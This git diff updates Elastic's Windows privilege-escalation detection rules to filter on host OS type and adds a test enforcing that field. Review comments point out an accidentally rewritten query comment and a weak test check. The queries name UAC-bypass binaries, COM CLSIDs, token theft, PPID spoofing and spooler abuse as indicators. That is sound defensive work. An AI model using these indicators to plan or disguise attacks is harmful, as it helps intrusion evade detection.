b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type : "deletion" and +file where host.os.type == "windows" and event.type : "deletion" and not process.name : ("spoolsv.exe", "dllhost.exe", "explorer.exe") and file.path : "?:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.dll" ''' diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml b/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml index 7b6e10a38..e76aa7159 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.extension : "spl" and file.path : "?:\\Windows\\System32\\spool\\PRINTERS\\*" and not process.name : ("spoolsv.exe", diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index d5651b6ca..a5b994c73 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-registry where registry.path : ("HKEY_USERS\\*\\Environment\\windir", "HKEY_USERS\\*\\Environment\\systemroot") and
+registry where host.os.type == "windows" and registry.path : ("HKEY_USERS\\*\\Environment\\windir", "HKEY_USERS\\*\\Environment\\systemroot") and
 not registry.data.strings : ("C:\\windows", "%SystemRoot%")
 '''
 
diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml
index fdf9d8142..65690acbc 100644
--- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml
+++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -37,7 +37,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-iam where event.action == "renamed-user-account" and
+iam where host.os.type == "windows" and event.action == "renamed-user-account" and
 /* machine account name renamed to user like account name */
 winlog.event_data.OldTargetUserName : "*$" and not winlog.event_data.NewTargetUserName : "*$"
 '''
diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml
index 34b89a371..36e27b181 100644
--- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml
+++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -32,17 +32,17 @@ type = "eql"
 
 query = '''
 sequence by winlog.computer_name with maxspan=5m
- [authentication where event.action == "logged-in" and
+ [authentication where host.os.type == "windows" and event.action == "logged-in" and
 winlog.logon.type == "Network" and event.outcome == "success" and
 not user.name == "ANONYMOUS LOGON" and
 not winlog.event_data.SubjectUserName : "*$" and
 not user.domain == "NT AUTHORITY" and
 source.ip != "127.0.0.1" and
 source.ip !="::1"] by winlog.event_data.TargetLogonId
- [iam where event.action == "changed-computer-account" and
+ [iam where host.os.type == "windows" and event.action == "changed-computer-account" and
 /* if DnsHostName value equal a DC DNS hostname then it's highly suspicious */
 winlog.event_data.DnsHostName : "??*" and
- /* exclude FPs where DnsHostName starts with the ComputerName that was changed */
+ /* exclude FPs where host.os.type == "windows" and DnsHostName starts with the ComputerName that was changed */
 not startswith~(winlog.event_data.DnsHostName, substring(winlog.event_data.TargetUserName, 0, length(winlog.event_data.TargetUserName) - 1))
 ] by winlog.event_data.SubjectLogonId
 '''
diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
index a5cbd5270..8b521152f 100644
--- a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
+++ b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
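Review bot: The replacement that added the OS filter also rewrote a comment inside the `iam` stage of the dnshostname rule, which now reads `/* exclude FPs where host.os.type == "windows" and DnsHostName starts with the ComputerName that was changed */` and no longer describes the `startswith~` exclusion beneath it; restore the original wording `/* exclude FPs where DnsHostName starts with the ComputerName that was changed */`. The two stage headers are correctly filtered, so the query still parses, but a comment that reads like a predicate will mislead the next person tuning this rule. It looks like the edit was applied to any line containing `where`, so the other hunks in this change are worth checking for comment lines altered the same way.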
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -46,7 +46,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-any where event.provider: "Microsoft-Windows-Security-Auditing" and
+any where host.os.type == "windows" and event.provider: "Microsoft-Windows-Security-Auditing" and
 event.action : "Token Right Adjusted Events" and
 winlog.event_data.EnabledPrivilegeList : "SeDebugPrivilege" and
 
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
index 1ff06c2de..bdecc8e3c 100644
--- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and process.name : "Clipup.exe" and
+process where host.os.type == "windows" and event.type == "start" and process.name : "Clipup.exe" and
 not process.executable : "C:\\Windows\\System32\\ClipUp.exe" and process.parent.name : "dllhost.exe" and
 /* CLSID of the Elevated COM Interface IEditionUpgradeManager */
 process.parent.args : "/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}"
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
index df6d6e0de..d76cfcf23 100644
--- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.executable : "C:\\*\\AppData\\*\\Temp\\IDC*.tmp\\*.exe" and
 process.parent.name : "ieinstal.exe" and process.parent.args : "-Embedding"
 
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
index aa5cd6dd2..849c0864e 100644
--- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name == "dllhost.exe" and
 process.parent.args in ("/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and
 process.pe.original_file_name != "WerFault.exe"
diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
index 30ed1f1ff..944b0e27f 100644
--- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.args : "/autoclean" and process.args : "/d" and
 not process.executable : ("C:\\Windows\\System32\\cleanmgr.exe",
 "C:\\Windows\\SysWOW64\\cleanmgr.exe",
diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
index 0b52e6f2c..79469b10a 100644
--- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-file where event.type : "change" and process.name : "dllhost.exe" and
+file where host.os.type == "windows" and event.type : "change" and process.name : "dllhost.exe" and
 /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */
 file.name : ("wow64log.dll", "comctl32.dll", "DismCore.dll", "OskSupport.dll", "duser.dll", "Accessibility.ni.dll") and
 /* has no impact on rule logic just to avoid OS install related FPs */
diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
index 7c92facf5..9e13964cc 100644
--- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
@@ -2,7 +2,7 @@ creation_date = "2020/03/17"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
 
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "eventvwr.exe" and
 not process.executable :
 ("?:\\Windows\\SysWOW64\\mmc.exe",
diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
index 80b0a458b..91b770b59 100644
--- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
@@ -2,7 +2,7 @@ creation_date = "2020/10/26"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
 
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.args : ("C:\\Windows \\system32\\*.exe", "C:\\Windows \\SysWOW64\\*.exe")
 '''
 
diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
index e7a75b731..c919518e3 100644
--- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
@@ -2,7 +2,7 @@ creation_date = "2020/10/14"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
 
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name == "mmc.exe" and
 /* process.Ext.token.integrity_level_name == "high" can be added in future for tuning */
 /* args of the Windows Firewall SnapIn */
diff --git a/rules/windows/privilege_escalation_uac_sdclt.toml b/rules/windows/privilege_escalation_uac_sdclt.toml
index a1e430b7e..3c32d79b0 100644
--- a/rules/windows/privilege_escalation_uac_sdclt.toml
+++ b/rules/windows/privilege_escalation_uac_sdclt.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/02"
 integration = ["endpoint", "windows"]
 maturity = "development"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 
 [rule]
 author = ["Elastic"]
@@ -26,12 +26,12 @@ query = '''
 /* still needs testing, applicable binary was not available on test machine */
 
 sequence with maxspan=1m
- [process where event.type == "start" and process.name : "sdclt.exe" and
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "sdclt.exe" and
 /* uncomment once in winlogbeat */
 /* process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true and */
 process.args : "/kickoffelev"
 ] by process.entity_id
- [process where event.type == "start" and process.parent.name : "sdclt.exe" and
+ [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "sdclt.exe" and
 not (process.executable : "C:\\Windows\\System32\\sdclt.exe" or
 process.executable : "C:\\Windows\\System32\\control.exe" or
 process.executable : "C:\\Windows\\SysWOW64\\sdclt.exe" or
diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
index 5acc65266..04d0ab341 100644
--- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
+++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
@@ -2,7 +2,7 @@ creation_date = "2020/02/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
 
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name != null and
 (
 /* suspicious parent processes */
diff --git a/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml b/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml
index ec2e3a120..aace35f0c 100644
--- a/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml
+++ b/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -36,7 +36,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "spoolsv.exe" and
 (?process.Ext.token.integrity_level_name : "System" or
 ?winlog.event_data.IntegrityLevel : "System") and
diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
index 40e81d588..b4ec04a47 100644
--- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
+++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "svchost.exe" and
 
 /* based on svchost service arguments -s svcname where the service is known to be childless */
diff --git a/rules/windows/privilege_escalation_via_ppid_spoofing.toml b/rules/windows/privilege_escalation_via_ppid_spoofing.toml
index e81d02b11..e6651c5c6 100644
--- a/rules/windows/privilege_escalation_via_ppid_spoofing.toml
+++ b/rules/windows/privilege_escalation_via_ppid_spoofing.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ type = "eql"
 query = '''
 /* This rule is compatible with Elastic Endpoint only */
 
-process where event.action == "start" and
+process where host.os.type == "windows" and event.action == "start" and
 
 /* process creation via seclogon */
 process.parent.Ext.real.pid > 0 and
diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml
index 1acf87252..126c6aa25 100644
--- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml
+++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -38,7 +38,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 
 query = '''
-file where event.action : "Pipe Created*" and
+file where host.os.type == "windows" and event.action : "Pipe Created*" and
 /* normal sysmon named pipe creation events truncate the pipe keyword */
 file.name : "\\*\\Pipe\\*"
 '''
diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml
index 64aefa8f8..c1e78fa86 100644
--- a/rules/windows/privilege_escalation_via_token_theft.toml
+++ b/rules/windows/privilege_escalation_via_token_theft.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup, process.Ext.effective_parent.executable"
 min_stack_version = "8.4.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ type = "eql"
 query = '''
 /* This rule is only compatible with Elastic Endpoint 8.4+ */
 
-process where event.action == "start" and
+process where host.os.type == "windows" and event.action == "start" and
 
 /* CreateProcessWithToken and effective parent is a privileged MS native binary used as a target for token theft */
 user.id : "S-1-5-18" and
diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
index 135cc0bf6..b16daaafa 100644
--- a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
+++ b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 
 [rule]
 author = ["Elastic"]
@@ -47,7 +47,8 @@ timestamp_override = "event.ingested"
 type = "query"
 
 query = '''
-event.action:"service-installed" and (winlog.event_data.ClientProcessId:"0" or winlog.event_data.ParentProcessId:"0")
+event.action:"service-installed" and host.os.type:windows and
+ (winlog.event_data.ClientProcessId:"0" or winlog.event_data.ParentProcessId:"0")
 '''
 
 
diff --git a/rules/windows/privilege_escalation_wpad_exploitation.toml b/rules/windows/privilege_escalation_wpad_exploitation.toml
index b514c4c8a..453016e47 100644
--- a/rules/windows/privilege_escalation_wpad_exploitation.toml
+++ b/rules/windows/privilege_escalation_wpad_exploitation.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/02"
 integration = ["endpoint"]
 maturity = "development"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 
 
 [rule]
 author = ["Elastic"]
@@ -27,15 +27,15 @@ query = '''
 /* didn't trigger successfully during testing */
 
 sequence with maxspan=5s
- [process where event.type == "start" and process.name : "svchost.exe" and
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "svchost.exe" and
 user.domain : "NT AUTHORITY" and user.name : "LOCAL SERVICE"] by process.entity_id
- [network where network.protocol : "dns" and process.name : "svchost.exe" and
+ [network where host.os.type == "windows" and network.protocol : "dns" and process.name : "svchost.exe" and
 dns.question.name : "wpad" and process.name : "svchost.exe"] by process.entity_id
- [network where process.name : "svchost.exe"
+ [network where host.os.type == "windows" and process.name : "svchost.exe" and
 network.direction : ("outgoing", "egress") and destination.port == 80] by process.entity_id
- [library where event.type : "start" and process.name : "svchost.exe" and
+ [library where host.os.type == "windows" and event.type : "start" and process.name : "svchost.exe" and
 dll.name : "jscript.dll" and process.name : "svchost.exe"] by process.entity_id
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "svchost.exe"] by process.parent.entity_id
 '''
 
diff --git a/tests/test_all_rules.py b/tests/test_all_rules.py
index dce79774b..995d8cc74 100644
--- a/tests/test_all_rules.py
+++ b/tests/test_all_rules.py
@@ -11,6 +11,7 @@ import warnings
 from collections import defaultdict
 from pathlib import Path
 
+import eql.ast
 from semver import Version
 
 import kql
@@ -814,3 +815,27 @@ class TestOsqueryPluginNote(BaseRuleTest):
             if osquery_note_pattern not in rule.contents.data.note:
                 self.fail(f'{self.rule_str(rule)} Investigation guides using the Osquery Markdown must contain '
                           f'the following note:\n{osquery_note_pattern}')
+
+
+class TestEndpointQuery(BaseRuleTest):
+    """Test endpoint-specific rules."""
+
+    def test_os_and_platform_in_query(self):
+        """Test that all endpoint rules have an os defined and linux includes platform."""
+        for rule in self.production_rules:
+            if not rule.contents.data.get('language') in ('eql', 'kuery'):
+                continue
+            if rule.path.parent.name not in ('windows', 'macos', 'linux'):
+                # skip cross-platform for now
+                continue
+
+            ast = rule.contents.data.ast
+            fields = [str(f) for f in ast if isinstance(f, (kql.ast.Field, eql.ast.Field))]
+
+            err_msg = f'{self.rule_str(rule)} missing required field for endpoint rule'
+            self.assertIn('host.os.type', fields, err_msg)
+
+            # going to bypass this for now
+            # if rule.path.parent.name == 'linux':
+            #     err_msg = f'{self.rule_str(rule)} missing required field for linux endpoint rule'
+            #     self.assertIn('host.os.platform', fields, err_msg)
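Review bot: `test_os_and_platform_in_query` only proves that `host.os.type` is referenced somewhere in the query, not that it is compared to the platform the rule is filed under, so a rule in `rules/windows` whose query says `host.os.type == "linux"` (or `not host.os.type == "windows"`) still passes; consider also checking the compared value against `rule.path.parent.name`, presumably by walking the comparison nodes of the AST rather than the flat field list. The language guard reads more naturally as `if rule.contents.data.get('language') not in ('eql', 'kuery'):`. `for f in ast` relies on both the kql and eql AST objects being iterable over their nodes — that looks intentional, but a one-line comment stating it would save the next reader a trip into both libraries. The commented-out `host.os.platform` block at the end is dead code; either keep it as a `# TODO` with the reason it is bypassed or drop it.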